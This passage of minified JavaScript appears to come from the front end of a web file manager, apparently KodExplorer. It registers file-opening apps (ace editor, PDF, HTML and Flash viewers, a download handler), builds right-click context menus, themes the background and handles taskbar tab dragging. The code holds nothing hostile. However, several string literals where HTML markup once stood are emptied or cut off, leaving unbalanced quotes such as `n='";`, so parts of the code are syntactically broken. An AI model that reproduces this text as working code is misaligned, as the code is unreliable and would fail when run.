a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/shareCommon/rightMenu",[],function(){var e=".menu-file",t=".menu-folder",a=".menu-more",i=".menu-tree-root",n=".menu-tree-folder",o=".menu-tree-file",s={"list-icon":{name:LNG.list_type,icon:"eye-open",items:{"set-icon":{name:LNG.list_icon,className:"menu-set-icon set-icon"},"set-list":{name:LNG.list_list,className:"menu-set-icon set-list"}}},"sort-by":{name:LNG.order_type,accesskey:"y",icon:"sort",items:{"set-sort-name":{name:LNG.name,className:"menu-set-sort set-sort-name"},"set-sort-ext":{name:LNG.type,className:"menu-set-sort set-sort-ext"},"set-sort-size":{name:LNG.size,className:"menu-set-sort set-sort-size"},"set-sort-mtime":{name:LNG.modify_time,className:"menu-set-sort set-sort-mtime"},sep105:"--------","set-sort-up":{name:LNG.sort_up,className:"menu-set-desc set-sort-up"},"set-sort-down":{name:LNG.sort_down,className:"menu-set-desc set-sort-down"}}},"set-file-icon-size":{name:LNG.file_size_title,icon:"picture",className:"set-file-icon-size",items:{"box-size-smallx":{name:LNG.file_size_small_super,className:"file-icon-size box-size-smallx"},"box-size-small":{name:LNG.file_size_small,className:"file-icon-size box-size-small"},"box-size-default":{name:LNG.file_size_default,className:"file-icon-size box-size-default"},"box-size-big":{name:LNG.file_size_big,className:"file-icon-size box-size-big"},"box-size-bigx":{name:LNG.file_size_big_super,className:"file-icon-size box-size-bigx"}}}},r=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),c(),d(),p(),u(),m(),v(),k(),y(),$(".set-set-"+G.userConfig.listType).addClass("selected"),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},l=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),m(),k(),g(),b(),y(),$(".context-menu-root").addClass("animated fadeIn")},c=function(){$.contextMenu({selector:".menu-body-main",className:"file-continer-menu",zIndex:9999,callback:function(e,t){f(e,t)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------","list-icon":s["list-icon"],"sort-by":s["sort-by"],"set-file-icon-size":s["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:t,className:t.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path+"Ctrl+F",className:"search",icon:"search",accesskey:"s"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},p=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:e,className:e.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},u=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:a,className:a.substr(1),callback:function(e){h(e)},items:{down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},f=function(e){switch(e){case"refresh":ui.f5(!0,!0);break;case"set-icon":ui.setListType("icon");break;case"set-list":ui.setListType("list");break;case"set-sort-name":ui.setListSort("name",0);break;case"set-sort-ext":ui.setListSort("ext",0);break;case"set-sort-size":ui.setListSort("size",0);break;case"set-sort-mtime":ui.setListSort("mtime",0);break;case"set-sort-up":ui.setListSort(0,"up");break;case"set-sort-down":ui.setListSort(0,"down");break;case"info":ui.path.info();break;case"box-size-smallx":ui.setFileIconSize(40);break;case"box-size-small":ui.setFileIconSize(60);break;case"box-size-default":ui.setFileIconSize(80);break;case"box-size-big":ui.setFileIconSize(150);break;case"box-size-bigx":ui.setFileIconSize(220);break;case"open":ui.path.open();break;default:}},h=function(e){switch(e){case"open":ui.path.open();break;case"down":ui.path.download();break;case"search":ui.path.search();break;case"show-file":ui.path.shareFile();break;case"open-project":ui.path.openProject();break;case"info":ui.path.info();break;default:}},m=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:i,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},v=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},g=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},b=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:o,callback:function(e){x(e)},items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},download:{name:LNG.download,className:"download",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},y=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},k=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{"close-all":{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},"show-all":{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},"hide-all":{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"show-all":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hide-all":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"close-all":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})},x=function(e){switch(e){case"open":ui.tree.open();break;case"refresh":ui.tree.refresh();break;case"info":ui.tree.info();break;case"explorer":ui.tree.explorer();break;case"open-project":ui.tree.openProject();break;case"show-file":ui.tree.showFile();break;case"download":ui.tree.download();break;case"search":ui.tree.search();break;case"refresh-all":ui.tree.init();break;case"quit":break;default:}};return{initExplorer:r,initEditor:l}}),define("app/common/taskTap",[],function(){var e={},t="",a=160,i=function(){$(".task-tab .tab").die("mouseenter").live("mouseenter",function(){$(this).hasClass("this")||$(this).addClass("hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("hover")})},n=function(e){var t=e.attr("id"),a=$.dialog.list[t];if(void 0==a)return c(t),void 0;var i=$("."+t);"hidden"==i.css("visibility")?a.display(!0).zIndex():i.hasClass("aui-state-focus")?a.display(!1):a.zIndex()},o=function(){var e,t,i,o,s=!1,r=!1,l=0,c=0,d=0,p=0,u=0,f=0;$(".task-tab .tab").die("mousedown").live("mousedown",function(t){1==t.which&&(e=$(this),h(t),this.setCapture&&this.setCapture(),$(document).mousemove(function(e){m(e)}),$(document).one("mouseup",function(t){g(),this.releaseCapture&&this.releaseCapture(),10>Math.abs(t.pageX-l)&&n(e)}))});var h=function(a){s=!0,r=!0,l=a.pageX,$tab_parent=$(".task-tab"),t=$(".task-tab .tab"),$(".tasktab-dragging").remove(),i=e.clone().addClass("tasktab-dragging").prependTo("body"),p=$sizeInt(t.css("margin-right")),u=$tab_parent.width(),f=$tab_parent.get(0).getBoundingClientRect().left,f+=$(window).scrollLeft(),c=e.get(0).getBoundingClientRect().left,d=$sizeInt(t.css("width"));var n=e.get(0).getBoundingClientRect().top-$sizeInt(e.css("margin-top")),o=a.clientX-l+c;$("body").prepend("
      "),i.css({width:d+"px",top:n,left:o}),e.css("opacity",0)},m=function(a){if(r){window.getSelection?window.getSelection().removeAllRanges():document.selection.empty(),0==s&&h(a);var n=a.clientX-l+c;f>n||n>f+u-d||(i.css("left",n),t.each(function(){var t=$(this).get(0).getBoundingClientRect().left;if(n>t&&t+d/2+p>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"left")}if(n>t-d/2+p&&t>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"right")}}))}},v=function(i,n){if(!e.is(":animated")||o!=i){o=i,e.stop(!0,!0),$(".insertTemp").remove(),t=$(".task-tab .tab");var s=e.width(),r=$(".task-tab #"+i),l=e.clone(!0).insertAfter(e).css({"margin-right":"0px",border:"none"}).addClass("insertTemp");"left"==n?e.after(r).css("width","0px"):(e.before(r).css("width","0px"),r.before(l)),e.animate({width:s+"px"},a),l.animate({width:"0px"},a,function(){$(this).remove(),t=$(".task-tab .tab") -})}},g=function(){r=!1,s=!1,startTime=0,$(".dragMaskView").remove(),void 0!=i&&(c=e.get(0).getBoundingClientRect().left,i.animate({left:c+"px"},a,function(){e.css("opacity",1),$(this).remove()}))}},s=function(e){var t=110,i=t,n=t+12,o=$(".task-tab .tab"),s=$(".task-tab .tabs").width()-10,r=o.length,l=Math.floor(s/n);switch(r>l&&(i=Math.floor(s/r)-12),e){case"add":$(".task-tab .tabs .this").css("width","0").animate({width:i+"px"},a);case"close":o.animate({width:i+"px"},a);break;case"resize":o.css("width",i+"px");break;default:}},r=function(t,a){$(".task-tab").removeClass("hidden");var i=a.replace(/<[^>]+>/g,""),n='";$(n).insertBefore(".task-tab .last"),s("add"),e[t]={id:t,name:name}},l=function(e){$(".task-tab .this").removeClass("this"),$(".task-tab #"+e).addClass("this"),t=e},c=function(t){$(".task-tab #"+t).animate({width:0},a,function(){if($(".task-tab #"+t).remove(),s("close"),0==$(".tabs .tab").length&&!core.isApp("desktop")){var e=31;$(".task-tab").animate({bottom:"-"+e+"px"},200,0,function(){$(this).css({bottom:"0px"}).addClass("hidden")})}}),delete e[t]},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},p=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{closeAll:{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},showAll:{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},hideAll:{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"showAll":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hideAll":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"closeAll":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})};return{add:r,focus:l,close:c,init:function(){var e='
